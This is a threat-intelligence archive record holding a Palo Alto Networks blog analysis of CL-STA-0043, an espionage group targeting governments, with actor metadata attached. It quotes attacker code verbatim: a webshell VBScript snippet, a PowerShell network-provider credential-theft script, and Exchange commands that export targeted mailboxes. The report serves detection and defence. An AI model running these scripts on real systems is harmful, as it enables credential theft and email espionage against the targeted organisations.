{
	"id": "7e49240a-ecfd-4ad6-a2f4-f2fb8dec4ae0",
	"created_at": "2026-04-06T00:18:38.078019Z",
	"updated_at": "2026-04-10T03:36:33.420673Z",
	"deleted_at": null,
	"sha1_hash": "8eb1aad0a59cc87d75b72ef46861567e73b13c00",
	"title": "Through the Cortex XDR Lens: Uncovering a New Activity Group Targeting Governments in the Middle East and Africa - Palo Alto Networks Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1697811,
	"plain_text": "Through the Cortex XDR Lens: Uncovering a New Activity Group\r\nTargeting Governments in the Middle East and Africa - Palo Alto\r\nNetworks Blog\r\nBy Lior Rochberger\r\nPublished: 2023-06-14 · Archived: 2026-04-02 11:51:51 UTC\r\nExecutive Summary\r\nThe Cortex Threat Research team has recently identified multiple espionage attacks targeting governmental entities in the\r\nMiddle East and Africa. According to our findings, the main goal of the attacks was to obtain highly confidential and\r\nsensitive information, specifically related to politicians, military activities, and ministries of foreign affairs.\r\nThe attacks, which happened around the same time frame, shared several unique similarities in tactics, techniques, and\r\nprocedures (TTPs), with some of them never reported before in the wild, while other techniques are relatively rare, with\r\njust a handful of attackers reported using them.\r\nWe currently track the activity group behind the attacks as CL-STA-0043. 
This activity group’s level of sophistication,\r\nadaptiveness, and victimology suggest a highly capable APT threat actor, and it is suspected to be a nation-state threat\r\nactor.\r\nWhile tracking and analyzing CL-STA-0043, we discovered new evasive techniques and tools used by the attackers, such\r\nas an in-memory VBS implant to run a webshell clandestinely, as well as a rare credential theft technique first seen in the\r\nwild.\r\nPerhaps one of the most interesting findings of this investigation is the rare and novel Exchange email exfiltration\r\ntechnique that was used by the attackers only on a few selected targets, according to our telemetry.\r\nIn this blog post, we will provide information regarding the various TTPs observed in the attacks, including the execution\r\nas shown through the lens of the Palo Alto Networks Cortex XDR product.\r\nTable of Contents\r\nExecutive Summary\r\nTable of Contents\r\nInfection Vector: An In-Memory VBS Implant\r\nReconnaissance\r\nPrivilege Escalation\r\nThe Potato Suite\r\nhttps://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/\r\nPage 1 of 14\n\nSticky Keys Attack is Making a Comeback\r\nIislpe IIS PE\r\nCredential Theft: Using Network Providers To Steal Credentials\r\nLateral Movement\r\nDebuting Yasso: A New Penetration Toolset\r\nAdditional Lateral Movement TTPs\r\nExfiltration: Stealing Targeted Email Data\r\nAbuse of the Exchange Management Shell\r\nAdd PowerShell snap-in (PSSnapins) to steal emails\r\nConclusion\r\nProtections and Mitigations\r\nIndicators Of Compromise\r\nAdditional Resources\r\nInfection Vector: An In-Memory VBS Implant\r\nIn the past couple of years, multiple zero-day exploits in on-premises IIS and Microsoft Exchange Servers led to a growing\r\ntrend of exploiting these servers to gain initial access to target networks.\r\nIn most cases, the main post-exploitation method 
observed in such attacks is to deploy various kinds of webshells, which\r\nprovide the attackers access to the compromised network via a remote shell.\r\nDuring an investigation of one of the instances, we observed a series of failed attempts to execute the infamous China\r\nChopper webshell, which were blocked by the Cortex XDR anti-webshell module. In the days following the failed\r\nattempts, we observed new suspicious activity originating from the Exchange Server’s w3wp.exe process, which upon\r\ninvestigation appeared to result from an in-memory VBScript implant deployed by the threat actor. The activity was\r\nalso detected by Cortex XDR.\r\nFigure 1. Detection of the Suspicious AMSI decode attempt, as shown in Cortex XDR.\r\nBelow is a snippet of the in-memory VBScript:\r\nrequest.Item(\"\u003credacted\u003e\");\r\nIStringList.Item();\r\nIServer.ScriptTimeout(\"3600\");\r\nIServer.CreateObject(\"Scripting.Dictionary\");\r\nIRequest.Form(\"key\");\r\nIStringList.Item();\r\nISessionObject.Value(\"payload\");\r\nIXMLDOMNode._00000029(\"base64\");\r\nIXMLDOMElement.dataType(\"bin.base64\");\r\nIXMLDOMElement.text(\"\u003credacted\u003e\");\r\nIXMLDOMElement.nodeTypedValue();\r\nISessionObject.Value(\"payload\");\r\nIDictionary.Add(\"payload\", \"Set Parameters=Server.CreateObject(\"Scripting.Dictionary\")\r\nFunction Base64Encode(sText)\r\nDim oXML, oNode\r\ni\");\r\nIDictionary.Item(\"payload\");\r\nIServer.CreateObject(\"Scripting.Dictionary\");\r\n_Stream.Charset(\"iso-8859-1\");\r\n_Stream.Type(\"1\");\r\n_Stream.Open();\r\n_Stream.Write(\"Unsupported parameter type 00002011\");\r\n\u003csnipped code\u003e\r\n_Stream.ReadText();\r\nIServer.CreateObject(\"WScript.shell\");\r\nIWshShell3._00000000();\r\nIWshShell3.Exec(\"cmd /c \"cd /d \"C:/\u003credacted\u003e/\"\u0026ipconfig /all\" 2\u003e\u00261\");\r\nReconnaissance\r\nOnce the attackers had penetrated the network, they performed reconnaissance activity, mapping out the network and\r\nidentifying critical assets. The attackers were mainly focused on finding administrative accounts and identifying important\r\nservers, such as:\r\nDomain controllers\r\nWeb servers\r\nExchange servers\r\nFTP servers\r\nSQL databases\r\nTo get this information, the attackers tried to execute the following tools:\r\nLadon web scanning tool (authored by “k8gege”)\r\nCustom network scanners\r\nNbtscan\r\nPortscan\r\nWindows commands: Netstat, nslookup, net, ipconfig, tasklist, quser\r\nFigure 2. Prevention of multiple tools by the Cortex XDR \u0026 XSIAM\r\nPrivilege Escalation\r\nThe Potato Suite\r\nIn order to carry out the attacks successfully, the threat actors needed to run their tools and commands with adequate\r\nprivileges (admin/system). To do so, they made use of different tools from the trending Potato suite. The Potato suite is a\r\ncollection of various native Windows privilege escalation tools. 
The main tools that were observed during the investigation\r\nwere:\r\nJuicyPotatoNG - a local privilege escalation tool, from a Windows service account to NT AUTHORITY\\SYSTEM.\r\nIt is based on RottenPotatoNG.\r\nSharpEfsPotato - a local privilege escalation tool using EfsRpc, built from SweetPotato.\r\nUsing those tools, the threat actor attempted to create administrative accounts, and to run various tools that require elevated\r\nprivileges.\r\nFigure 3. Prevention of JuicyPotatoNG by the Cortex XDR \u0026 XSIAM WildFire module\r\nSticky Keys Attack is Making a Comeback\r\nAnother technique that we observed during the attacks was the well-known privilege escalation technique called “Sticky\r\nKeys”.\r\nThe Windows operating system contains accessibility features that may be launched with a key combination before a user\r\nhas logged in to the system, or by an unprivileged user. An attacker can modify the way these programs are launched to get\r\na command prompt or a backdoor.\r\nOne of the common accessibility features is sethc.exe, which is often referred to as “Sticky Keys”. In the attack, the\r\nattacker usually replaces the sethc.exe binary, or the pointers/references to it in the registry, with cmd.exe. When\r\nexecuted, it provides an elevated command prompt shell to the attacker to run arbitrary commands and other tools.\r\nThere were multiple observed attempts to edit the registry key for sethc.exe to point to cmd.exe and subsequently run the\r\nsethc.exe file with the parameter “211”. This turns on the system’s “Sticky Keys” feature, which in turn executes the\r\nelevated command prompt shell.\r\nFigure 4. 
Prevention of Sticky Key attack by the Cortex XDR \u0026 XSIAM\r\nIislpe IIS PE\r\nIn addition, the attackers used a privilege escalation tool, “Iislpe.exe”, which is an IIS privilege escalation tool written by\r\n“k8gege”, the same author who created the aforementioned Ladon tool.\r\nCredential Theft: Using Network Providers To Steal Credentials\r\nIn the attacks clustered under the CL-STA-0043 activity group, many techniques and tools were deployed to\r\nsteal credentials, such as Mimikatz, dumping the SAM key, forcing WDigest to store credentials in plaintext, and dumping the\r\nNTDS.dit file from Active Directory using ntdsutil.exe. These techniques are all well-known and documented.\r\nHowever, one technique did stand out, since it was only first reported as a POC (Proof of Concept) in August 2022, and up\r\nto the time of writing this report, there were no public mentions of this technique being exploited in the wild.\r\nUsing this method, the attackers executed a PowerShell script that registered a new network provider, named “ntos”, set to\r\nexecute a malicious DLL, ntos.dll, dropped by the attacker in the C:\\Windows\\system32 folder.\r\n$path = Get-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order\" -Name PROVIDERORDER\r\n$UpdatedValue = $Path.PROVIDERORDER + \",ntos\"\r\nSet-ItemProperty -Path $Path.PSPath -Name \"PROVIDERORDER\" -Value $UpdatedValue\r\nNew-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\ntos\r\nNew-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\ntos\\NetworkProvider\r\nNew-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\ntos\\NetworkProvider -Name \"Class\" -Value 2\r\nNew-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\ntos\\NetworkProvider -Name \"Name\" -Value ntos\r\nNew-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\ntos\\NetworkProvider -Name \"ProviderPath\" -PropertyType ExpandString -Value \"%SystemRoot%\\System32\\ntos.dll\"\r\nAs part of the login activity, Winlogon.exe captures the user and password and forwards them to mpnotify.exe, which loads\r\nthe malicious DLL and shares the cleartext passwords with it. The malicious DLL then creates a new file containing the\r\nstolen credentials. This file is then sent to the attackers’ command and control (C2) server.\r\nFigure 5. Prevention of the credential theft attempt, as shown in Cortex XDR \u0026 XSIAM.\r\nLateral Movement\r\nDebuting Yasso: A New Penetration Toolset\r\nAs part of the investigation of the activity in CL-STA-0043, we observed the use of a relatively new penetration testing\r\ntoolset - “Yasso”. Interestingly, although this tool has been publicly available since January 2022, at the time of this\r\nreport there were no publicly reported cases where this tool had been used in the wild.\r\nYasso, authored by a Mandarin-speaking pentester nicknamed Sairson, is an open source multi-platform intranet-assisted\r\npenetration toolset that brings together a number of features such as scanning, brute forcing, remote interactive shell, and\r\nrunning arbitrary commands.\r\nIn addition, Yasso has powerful SQL penetration functions, and it provides a range of database functionalities for the\r\noperator to perform remote actions.\r\nFigure 6. 
Yasso command line tool.\r\nThe following Yasso modules were most in use during the attacks:\r\nSMB – SMB service brute-force module\r\nWinrm – Winrm service brute-force module\r\nSSH – SSH service brute-force module, fully interactive shell connection\r\nMSSQL – SQL Server service brute-force module and privilege escalation auxiliary module\r\nThe use of the different Yasso modules was detected in the Cortex XDR \u0026 XSIAM product, as shown in Figure 7.\r\nFigure 7. Detection of the Yasso tool execution, as shown in Cortex XDR \u0026 XSIAM.\r\nThose modules, in combination with text files that contain target endpoints, usernames and passwords, were used to\r\nperform an NTLM spray attack. In this attack, the attacker tried to log in to multiple servers using different combinations of\r\nmultiple users and passwords in a short period of time. Cortex XDR \u0026 XSIAM’s Identity Analytics module detected the\r\nanomaly and raised multiple alerts for the suspicious behavior, as shown in Figure 8.\r\nFigure 8. Detection by the Identity Analytics module of the NTLM spray attack, as shown in Cortex XDR \u0026\r\nXSIAM.\r\nAdditional Lateral Movement TTPs\r\nBesides the use of Yasso for lateral movement, the attackers were also observed using other common and known techniques\r\nto accomplish that.\r\nThe tools observed were mostly native Windows tools such as WMI, Scheduled Tasks, Winrs and Net. In addition, the use of\r\nSamba SMBclient for lateral movement was observed in some instances.\r\nExfiltration: Stealing Targeted Email Data\r\nOne of the most interesting techniques observed in the attacks was the targeted data exfiltration method from the\r\ncompromised Exchange servers. A variation of this technique was reported before to be used by Hafnium. 
This activity\r\nconsists of abusing the Exchange Management Shell or PowerShell scripts in order to steal emails and PST files according\r\nto specific keywords that the threat actors deem important.\r\nTo gather those emails, two unique methods were observed:\r\nAbuse of the Exchange Management Shell\r\nAdd PowerShell snap-in (PSSnapins) to steal emails through a script\r\nFigure 9. Prevention of the Exchange management shell abuse, as shown in Cortex XDR \u0026 XSIAM.\r\nAbuse of the Exchange Management Shell\r\nIn the first method, we observed the abuse of the Exchange Management Shell (exshell.psc1) to run a command that saved\r\nall emails from users that contain the string “foreign” and all emails sent from or to governmental accounts, into CSV files.\r\npowershell.exe -psconsolefile \"C:\\Program files\\microsoft\\exchange server\\v15\\bin\\exshell.psc1\" -command \"get-mailbox -Filter \\\"UserPrincipalName -Like \\\"*foreign*\\\"\\\" -ResultSize Unlimited | get-mailboxstatistics | sort-object TotalItemSize -Descending | Select-Object DisplayName,Alias,TotalItemSize -First 30 | export-csv c:\\users\\public\\\u003credacted\u003e\\\u003credacted\u003e.csv\"\r\npowershell.exe -psconsolefile \"C:\\Program files\\microsoft\\exchange server\\v15\\bin\\exshell.psc1\" -command \"Get-MessageTrackingLog -ResultSize Unlimited | Where-Object {$_.Recipients -like \\\"*@\u003credacted\u003e.gov.\u003credacted\u003e\\\"}| select-object Sender,{$_.Recipients},{$_.MessageSubject} | export-csv c:\\users\\public\\\u003credacted\u003e\\\u003credacted\u003e.csv\"\r\npowershell.exe -psconsolefile \"C:\\Program files\\microsoft\\exchange server\\v15\\bin\\exshell.psc1\" -command \"Get-MessageTrackingLog -ResultSize Unlimited | Where-Object {$_.sender -like \\\"*@\u003credacted\u003e.gov.\u003credacted\u003e\\\"}| select-object Sender,{$_.Recipients},{$_.MessageSubject} | export-csv c:\\users\\public\\\u003credacted\u003e\\\u003credacted\u003e.csv\"\r\nIn addition to the command lines above, other searches for specific content (using the filter “($_.MessageSubject -like '*\u003credacted\u003e*')”) were observed as well. Those searches were for very specific individuals and information related to highly\r\nsensitive state and foreign policy matters.\r\nAdd PowerShell snap-in (PSSnapins) to steal emails\r\nIn the second method, we observed the execution of multiple PowerShell scripts that add the Exchange PowerShell snap-ins,\r\nto allow the attackers to manage the Exchange server and steal emails.\r\nBelow is a snippet of the script, which originally contained over 30 targeted mailboxes of individuals, embassies, military-related organizations, and others.\r\n$date=(Get-Date).AddDays(-3);\r\n$server=$env:computername;\r\n$path=\"\\\\\\\\$server\\\\c$\\\\users\\\\public\\\\libraries\\\\\" + [Guid]::newGuid().ToString();\r\nmkdir $path;\r\nAdd-PSSnapin Microsoft.Exchange.Management.Powershell.E2010;\r\n$culture = [System.Globalization.CultureInfo]::CreateSpecificCulture(\"en-US\");\r\n$culture.NumberFormat.NumberDecimalSeparator = \".\";\r\n$culture.NumberFormat.NumberGroupSeparator = \",\";\r\n[System.Threading.Thread]::CurrentThread.CurrentCulture = $culture;\r\n$filter = \"(Received -ge'$date') -or (Sent -ge'$date')\";\r\nNew-MailboxExportRequest -Name Request1 -Mailbox '\u003credacted\u003e.atlanta' -ContentFilter $filter -FilePath \"$path\\\\\u003credacted\u003e.atlanta.pst\";\r\nNew-MailboxExportRequest -Name Request2 -Mailbox '\u003credacted\u003e.Kuwait' -ContentFilter $filter -FilePath \"$path\\\\\u003credacted\u003e.Kuwait.pst\";\r\nNew-MailboxExportRequest -Name Request3 -Mailbox '\u003credacted\u003e.Ankara' -ContentFilter $filter -FilePath \"$path\\\\\u003credacted\u003e.Ankara.pst\";\r\nNew-MailboxExportRequest -Name Request4 -Mailbox '\u003credacted\u003e.Paris' -ContentFilter $filter -FilePath \"$path\\\\\u003credacted\u003e.Paris.pst\";\r\nNew-MailboxExportRequest -Name Request5 -Mailbox 'permanentsecretary' -ContentFilter $filter -FilePath \"$path\\\\permanentsecretary.pst\";\r\n# New-MailboxExportRequest -Name Request6 -Mailbox '\u003credacted\u003e Press Office' -ContentFilter $filter -FilePath \"$path\\\\\u003credacted\u003e.Press.Office.pst\";\r\nThe output of those scripts was saved into .tiff files, under “c:\\users\\public\\\u003credacted\u003e”, which were later compressed,\r\npassword-protected and sent to the attacker’s C2 server as well.\r\nFigure 10. Exchange management shell abuse, as shown in Cortex XDR \u0026 XSIAM.\r\nFigure 11. Identity analytics alert for 7zip process accessing Outlook files, as shown in the Cortex XDR \u0026\r\nXSIAM.\r\nConclusion\r\nIn this blog, we uncovered several previously unreported and rare techniques and tools observed in use by a cluster of\r\nactivity we refer to as CL-STA-0043. While the research is still ongoing, and the full identity of the threat actor/s is still\r\nbeing studied, we believe that the level of sophistication, determination and espionage motives demonstrated in this report\r\nbear the hallmarks of a true advanced persistent threat, potentially operating on behalf of nation-state interests. 
In the same\r\nvein, this sheds light on how threat actors seek to obtain non-public and confidential information about geopolitics-related\r\ntopics and high-ranking public service individuals.\r\nProtections and Mitigations\r\nDuring the attacks, Cortex XDR \u0026 XSIAM raised many alerts for the malicious activities observed in CL-STA-0043.\r\nPrevention and detection alerts were raised for each phase of the attack: the initial access attempts, the use of rare tools and\r\nthe advanced technique, and for the data exfiltration attempts.\r\nSmartScore, a unique ML-driven scoring engine that translates security investigation methods and their associated data into\r\na hybrid scoring system, scored this incident 100 - the highest level of risk.\r\nFigure 12. SmartScore information about the incident\r\nFor Palo Alto Networks customers, our products and services provide the following coverage associated with this group:\r\nCortex XDR detects user and credential-based threats by analyzing user activity from multiple data sources including\r\nendpoints, network firewalls, Active Directory, identity and access management solutions, and cloud workloads. It builds\r\nbehavioral profiles of user activity over time with machine learning. 
By comparing new activity to past activity, peer\r\nactivity, and the expected behavior of the entity, Cortex XDR detects anomalous activity indicative of credential-based\r\nattacks.\r\nIt also offers the following protections related to the attacks discussed in this post:\r\nPrevents the execution of known malware and also prevents the execution of unknown malware using\r\nBehavioral Threat Protection and machine learning based on the Local Analysis module.\r\nProtects against credential gathering tools and techniques using the new Credential Gathering Protection available\r\nfrom Cortex XDR 3.4.\r\nProtects against threat actors dropping and executing commands from webshells using Anti Webshell Protection,\r\nnewly released in Cortex XDR 3.4.\r\nProtects against exploitation of different vulnerabilities including ProxyShell and ProxyLogon using the Anti-Exploitation modules as well as Behavioral Threat Protection.\r\nCortex XDR Pro detects post-exploit activity, including credential-based attacks, with behavioral analytics.\r\nIf you think you may have been impacted or have an urgent matter, get in touch with the Unit 42 Incident Response team or\r\ncall:\r\nNorth America Toll-Free: 866.486.4842 (866.4.UNIT42)\r\nEMEA: +31.20.299.3130\r\nAPAC: +65.6983.8730\r\nJapan: +81.50.1790.0200\r\nIndicators Of Compromise\r\nYasso\r\n6b37aec6253c336188d9c8035e90818a139e3425c6e590734f309bd45021f980\r\nCredential Dumping Tool 
(sam.exe)\r\n77a3fa80621af4e1286b9dd07edaa37c139ca6c18e5695bc9b2c644a808f9d60\r\niislpe.exe\r\n73b9cf0e64be1c05a70a9f98b0de4925e62160e557f72c75c67c1b8922799fc4\r\nSMBexec\r\nE781ce2d795c5dd6b0a5b849a414f5bd05bb99785f2ebf36edb70399205817ee\r\nnbtscan\r\n0f22e178a1e1d865fc31eb5465afbb746843b223bfa0ed1f112a02ccb6ce3f41\r\nLadon\r\n291bc4421382d51e9ee42a16378092622f8eda32bf6b912c9a2ce5d962bcd8f4\r\naa99ae823a3e4c65969c1c3aa316218f5829544e4a433a4bab9f21df11d16154\r\nddcf878749611bc8b867e99d27f0bb8162169a8596a0b2676aa399f0f12bcbd7\r\nntos.dll\r\nbcd2bdea2bfecd09e258b8777e3825c4a1d98af220e7b045ee7b6c30bf19d6df\r\nAdditional Resources\r\nHunting for the Recent Attacks Targeting Microsoft Exchange\r\nStopping “PowerShell without PowerShell” Attacks\r\nDetecting Credential Stealing with Cortex XDR\r\nCredential Gathering From Third-Party Software\r\nAnalyzing Attacks Against Microsoft Exchange Server With China Chopper Webshells\r\nTHOR: Previously Unseen PlugX Variant Deployed During Microsoft Exchange Server Attacks by PKPLUG Group\r\nhttps://broadcom-software.security.com/blogs/threat-intelligence/witchetty-steganography-espionage\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nhttps://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\r\nSource: https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"ETDA"
	],
	"references": [
		"https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/"
	],
	"report_names": [
		"through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa"
	],
	"threat_actors": [
		{
			"id": "faa4a29b-254a-45bd-b412-9a1cbddbd5e3",
			"created_at": "2022-10-25T16:07:23.80111Z",
			"updated_at": "2026-04-10T02:00:04.753677Z",
			"deleted_at": null,
			"main_name": "LookBack",
			"aliases": [
				"FlowingFrog",
				"LookBack",
				"LookingFrog",
				"TA410",
				"Witchetty"
			],
			"source_name": "ETDA:LookBack",
			"tools": [
				"FlowCloud",
				"GUP Proxy Tool",
				"SodomMain",
				"SodomMain RAT",
				"SodomNormal"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "93542ae8-73cb-482b-90a3-445a20663f15",
			"created_at": "2022-10-25T16:07:24.058412Z",
			"updated_at": "2026-04-10T02:00:04.853499Z",
			"deleted_at": null,
			"main_name": "PKPLUG",
			"aliases": [
				"Stately Taurus"
			],
			"source_name": "ETDA:PKPLUG",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7c969685-459b-4c93-a788-74108eab6f47",
			"created_at": "2023-01-06T13:46:39.189751Z",
			"updated_at": "2026-04-10T02:00:03.241102Z",
			"deleted_at": null,
			"main_name": "HAFNIUM",
			"aliases": [
				"Red Dev 13",
				"Silk Typhoon",
				"MURKY PANDA",
				"ATK233",
				"G0125",
				"Operation Exchange Marauder"
			],
			"source_name": "MISPGALAXY:HAFNIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9ffcbb0c-7a0f-419f-a174-f18a02ce47f1",
			"created_at": "2023-01-06T13:46:39.059774Z",
			"updated_at": "2026-04-10T02:00:03.199867Z",
			"deleted_at": null,
			"main_name": "TA410",
			"aliases": [],
			"source_name": "MISPGALAXY:TA410",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ffc66b49-9396-46af-966f-9376c4315f32",
			"created_at": "2023-11-21T02:00:07.339061Z",
			"updated_at": "2026-04-10T02:00:03.462317Z",
			"deleted_at": null,
			"main_name": "CL-STA-0043",
			"aliases": [
				"TGR-STA-0043"
			],
			"source_name": "MISPGALAXY:CL-STA-0043",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3e8f802c-efba-45ff-8844-5ea4e4a5297d",
			"created_at": "2023-11-07T02:00:07.092751Z",
			"updated_at": "2026-04-10T02:00:03.404589Z",
			"deleted_at": null,
			"main_name": "Witchetty",
			"aliases": [
				"LookingFrog"
			],
			"source_name": "MISPGALAXY:Witchetty",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2704d770-43b4-4bc4-8a5a-05df87416848",
			"created_at": "2022-10-25T15:50:23.306305Z",
			"updated_at": "2026-04-10T02:00:05.296581Z",
			"deleted_at": null,
			"main_name": "HAFNIUM",
			"aliases": [
				"HAFNIUM",
				"Operation Exchange Marauder",
				"Silk Typhoon"
			],
			"source_name": "MITRE:HAFNIUM",
			"tools": [
				"Tarrask",
				"ASPXSpy",
				"Impacket",
				"PsExec",
				"China Chopper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "cff2cedd-a198-4e79-ae67-19048084ae7f",
			"created_at": "2024-06-20T02:02:09.945126Z",
			"updated_at": "2026-04-10T02:00:04.79991Z",
			"deleted_at": null,
			"main_name": "Operation Diplomatic Specter",
			"aliases": [
				"CL-STA-0043",
				"TGR-STA-0043"
			],
			"source_name": "ETDA:Operation Diplomatic Specter",
			"tools": [
				"Agent Racoon",
				"Agent.dhwf",
				"AngryRebel",
				"CHINACHOPPER",
				"China Chopper",
				"Destroy RAT",
				"DestroyRAT",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HTran",
				"HUC Packet Transmit Tool",
				"JuicyPotatoNG",
				"Kaba",
				"Korplug",
				"LadonGo",
				"Mimikatz",
				"Mimilite",
				"Moudour",
				"Mydoor",
				"NBTscan",
				"Ntospy",
				"PCRat",
				"PlugX",
				"RedDelta",
				"SharpEfsPotato",
				"SinoChopper",
				"Sogu",
				"SweetSpecter",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"TunnelSpecter",
				"Xamtrav",
				"Yasso",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "529c1ae9-4579-4245-86a6-20f4563a695d",
			"created_at": "2022-10-25T16:07:23.702006Z",
			"updated_at": "2026-04-10T02:00:04.71708Z",
			"deleted_at": null,
			"main_name": "Hafnium",
			"aliases": [
				"G0125",
				"Murky Panda",
				"Red Dev 13",
				"Silk Typhoon"
			],
			"source_name": "ETDA:Hafnium",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434718,
	"ts_updated_at": 1775792193,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8eb1aad0a59cc87d75b72ef46861567e73b13c00.pdf",
		"text": "https://archive.orkl.eu/8eb1aad0a59cc87d75b72ef46861567e73b13c00.txt",
		"img": "https://archive.orkl.eu/8eb1aad0a59cc87d75b72ef46861567e73b13c00.jpg"
	}
}